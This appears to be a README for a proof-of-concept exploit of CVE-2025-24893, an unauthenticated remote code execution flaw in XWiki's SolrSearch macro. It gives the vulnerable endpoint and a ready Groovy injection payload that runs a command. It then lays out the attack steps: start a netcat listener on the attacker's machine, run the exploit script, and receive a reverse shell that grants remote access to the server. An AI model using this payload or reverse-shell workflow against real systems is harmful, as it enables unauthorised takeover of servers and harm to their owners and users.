
Proof-of-concept exploit for CVE-2025-24893, an unauthenticated remote code execution vulnerability in XWiki via unsafe Groovy expression handling in the SolrSearch macro.
⚠️ Unauthenticated Remote Code Execution in XWiki
🛠️ PoC implementation by @dollarboysushil
CVE-2025-24893 is a critical RCE vulnerability in XWiki, caused by unsafe Groovy expression handling inside the SolrSearch macro. An attacker can inject Groovy code through a crafted GET request, leading to remote code execution (no authentication required).
The vulnerability resides in the SolrSearch macro (Main.SolrSearch) of XWiki, which handles search input using unsafe Groovy evaluation. The macro fails to sanitize user-supplied input, allowing for arbitrary code execution.
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
An attacker can inject Groovy code into the text parameter, which is evaluated server-side due to improper input handling within the macro system.
}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}
This leads to unauthenticated Remote Code Execution (RCE) on vulnerable XWiki instances.
The vulnerable target is an XWiki instance running version 15.10.8, which is affected by CVE-2025-24893.

Start a Netcat listener on the attacker's machine to capture the reverse shell connection:
nc -lvnp 1337

Run the exploit script CVE-2025-24893-dbs.py to deliver the Groovy-based RCE payload to the vulnerable XWiki endpoint.

Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.
